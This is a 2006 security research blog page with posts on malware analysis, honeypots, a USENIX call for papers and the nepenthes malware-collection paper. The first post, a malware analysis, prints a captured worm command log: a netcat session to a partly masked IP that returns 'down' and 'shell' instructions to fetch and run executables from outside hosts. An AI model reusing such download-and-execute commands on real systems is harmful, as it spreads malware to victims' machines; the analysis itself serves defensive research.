CWSandbox vs. MSN Worms

Thursday, September 28. 2006
The very good weblog from F-Secure had recently an entry entitled "MSN Worm Used to Download Adware Programs" (thanks common for pointing this out!). For downloading additional malware to the infected hosts, it uses a very simple transfer mechanism on TCP port 80:
$ nc XXX.64.38.YYY 80

down http://www.lollpics.net/[Removed] a.exe;shell a.exe;

down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;

shell drsmartload1135a.exe;

down http://www.uglyphotos.net/[Removed] Yinstall.exe;

shell Yinstall.exe;

down http://www.lollpics.net/[Removed] mny.exe;

shell mny.exe;

shell a.exe;

shell a.exe;

shell a.exe;

So the infected host just contacts XXX.64.38.YYY on TCP port 80 and then receives instructions to download several files, which are executed in the next step. Currently, four additional pieces of malware are installed on the compromised machine, on of them being again Adware related to dollarrevenue.com. A full analysis report (detailed XML report) generated by CWSandbox is also available.

And a link from a reader (thanks Jean-Philippe!): Trend Micro launches anti-botnet service. Seems like there are now several companies who offer such services, let's see who is successful...
Posted by Thorsten Holz in malware at 00:11 | Comments (3) | Trackbacks (0)

Call for Paper: 16th USENIX Security Symposium

Tuesday, September 26. 2006
The Call for Papers for the 16th USENIX Security Symposium is now available. I am very proud to be one of the members of the program committee and of course I would like to see many honeynet-related papers submitted to the conference!

Important dates:
  • Paper submissions due: Thursday, February 1, 2007, 11:59 p.m. PST

  • Panel proposals due: Thursday, March 29, 2007

  • Notification to authors: Wednesday, April 4, 2007

  • Final papers due: Monday, May 14, 2007

  • Work-in-Progress reports due: Wednesday, August 8, 2007, 6:00 p.m. EDT

The conference will be held from August 6–10, 2007, in Boston, MA.

About USENIX Security:
The USENIX Security Symposium brings together researchers, practitioners, system administrators, system programmers, and others interested in the latest advances in the security of computer systems and networks. T

All researchers are encouraged to submit papers covering novel and scientifically significant practical works in security or applied cryptography. Submissions are due on February 1, 2007, 11:59 p.m. PST. The Symposium will span five days: a two-day training program will be followed by a two and one-half day technical program, which will include refereed papers, invited talks, Work-in-Progress reports, panel discussions, and Birds-of-a-Feather sessions.

Continue reading "Call for Paper: 16th USENIX Security Symposium"

Posted by Thorsten Holz in administrativa, paper at 20:29 | Comments (0) | Trackbacks (0)

Hack In The Box 2006 Honeypot Summary

Monday, September 25. 2006
I'm now back from Hack In The Box 2006, the largest security conference in Asia. It was a really nice conference and if you have some time next year, you should go there and enjoy the conference!

From a honeypot point of view, there were three interesting presentations:
  1. Michael Davis - "Client Honeypots - Its not only the network": he did a presentation about client-side honeypots, i.e., honeypots that are able to learn more about attacks against client applications like web browsers or e-mail clients. This kind of honeypots typically searches for malicious content, e.g., by crawling the web. The presentation contains links to the four most prevalent client-side honeypot solution available for now.
  2. Nguyen Anh Quynh - "Towards an Invisible Honeypot Monitoring Tool": the presentation by Nguyen was about Xebek, a monitoring solution for honeypots based on Xen. It overcomes most of the weaknesses by Sebek, and he plans to publish it in the near future (hopefully).
  3. Thorsten Holz - "Playing with Botnets for Fun and Profit": my presentation dealt with nepenthes, CWSandbox, and some economic aspects of botnets.

All slides are now available at the material site.
Posted by Thorsten Holz in honeynets at 19:13 | Comments (0) | Trackbacks (0)

CWSandbox vs. Click-Fraud Trojans

Sunday, September 24. 2006
Business Week had an interesting story about click fraud recently (also at /.). This seems to be a really lucrative business and there is of course also malware that helps the attacker to automatically generate clicks on websites.
One example of such a piece of malware is Trojan.Clicker (named by F-Secure), which currently also dominates the monthly world map of malware infections. The operation mode of this Trojan is rather simple: after the initial infect (e.g., download via bots), it remains resident in memory and periodically opens certain web pages with the help of Internet Explorer, thus generating clicks on that web page. Hence, the attacker automatically generates revenue from his compromised machines...
A more detailed analysis of a particular Trojan.Clicker variant is available as CWSandbox report.
Posted by Thorsten Holz in malware at 06:02 | Comments (0) | Trackbacks (0)

HoneyPoint Security Server

Saturday, September 23. 2006
There is a new commercial honeypot solution available: HoneyPoint Security Server. The description sounds like it is some kind of "honeyd on steroids" with nice alerting mechanisms: it creates virtual hosts on the network and these hosts serve as sensors for a burglar alarm. Once a sensor is hit (e.g., during the reconnaissance phase prior to the attack), simply an alarm is generated since nobody should access the sensors (basic principle of honeypots). I'm looking forward to get a trial version and blog more about it later on. Because currently it seems like everyone can build something like that with some more honeyd scripting...

Excerpt from the description:

[...] The idea is an old one. The implementation is new. The idea of honeypots goes back a long way. They are essentially based upon the idea that if you create artifical systems or services on your network, an attacker will not know if what they see is real. The idea is that in order to determine what is real, they will have to probe and attack all of the visible targets. In doing so, they will, in more cases than not, probe a honeypot - thus alerting security folks to their presence. Obviously, the more honeypots, the higher the likelihood of their being probed instead of a real system.

This is the basis for HoneyPoint. We use it to make our systems offer services across the network that appear to be vanilla and homogenous. Imagine a big 10×10 grid of light sockets. If you had a light bulb and were asked to screw it into some of the sockets in the board, but some of the sockets were real and would light the bulb, while others would set off an alarm - how would you go about identifying which ones were real and which were alarms? You might carefully examine them, but if they all look similiar, the only way to know would be to try them.

That is exactly what we do with HoneyPoint. We dialate ports across our systems with similiar appearing services, and then wait for attackers to try and figure out which ones are real and which ones are HoneyPoints. Just by doing what attackers do - that is, probing the network and services they find - they fall into our trap and alert us to their presence. Once identified, they can be quickly isolated and shut down by network security staff.
[...]
Posted by Thorsten Holz in honeynets at 09:46 | Comments (0) | Trackbacks (0)

Philippine Honeynet Project: "Hackers in the House"

Saturday, September 23. 2006
A detailed analysis of a honeypot compromise at one of the honeypots of the Philippine Honeynet project is available at their site. Our honeynet is currently rather silent, mainly due to the fact that we are currently in a rebuilding phase - but by the end of next week, we should have a couple of honeypots up and running again.
Posted by Thorsten Holz in honeynets at 05:33 | Comments (0) | Trackbacks (0)

The Nepenthes Platform: An Efficient Approach to Collect Malware

Thursday, September 21. 2006
At the RAID'06 conference taking place in Hamburg between September 20 and 22, we published a paper on nepenthes. It describes nepenthes in detail and gives an overview of preliminary results. I had published excerpt from the paper previously here at this blog, but now also the final paper is available.

Abstract:
Up to now, there is little empirically backed quantitative and qualitative knowledge about self-replicating malware publicly available. This hampers research in these topics because many counter-strategies against malware, e.g., network- and host-based intrusion detection systems, need hard empirical data to take full effect.
We present the nepenthes platform, a framework for large-scale collection of information on self-replicating malware in the wild. The basic principle of nepenthes is to emulate only the vulnerable parts of a service. This leads to an efficient and effective solution that offers many advantages compared to other honeypot-based solutions. Furthermore, nepenthes offers a flexible deployment solution, leading to even better scalability. Using the nepenthes platform we and several other organizations were able to greatly broaden the empirical basis of data available about self-replicating malware and provide thousands of samples of previously unknown malware to vendors of host-based IDS/anti-virus systems. This greatly improves the detection rate of this kind of threat.

Continue reading "The Nepenthes Platform: An Efficient Approach to Collect Malware"

Posted by Thorsten Holz in honeynets, paper at 13:52 | Comments (0) | Trackbacks (0)
(Page 1 of 2, totaling 12 entries) » next page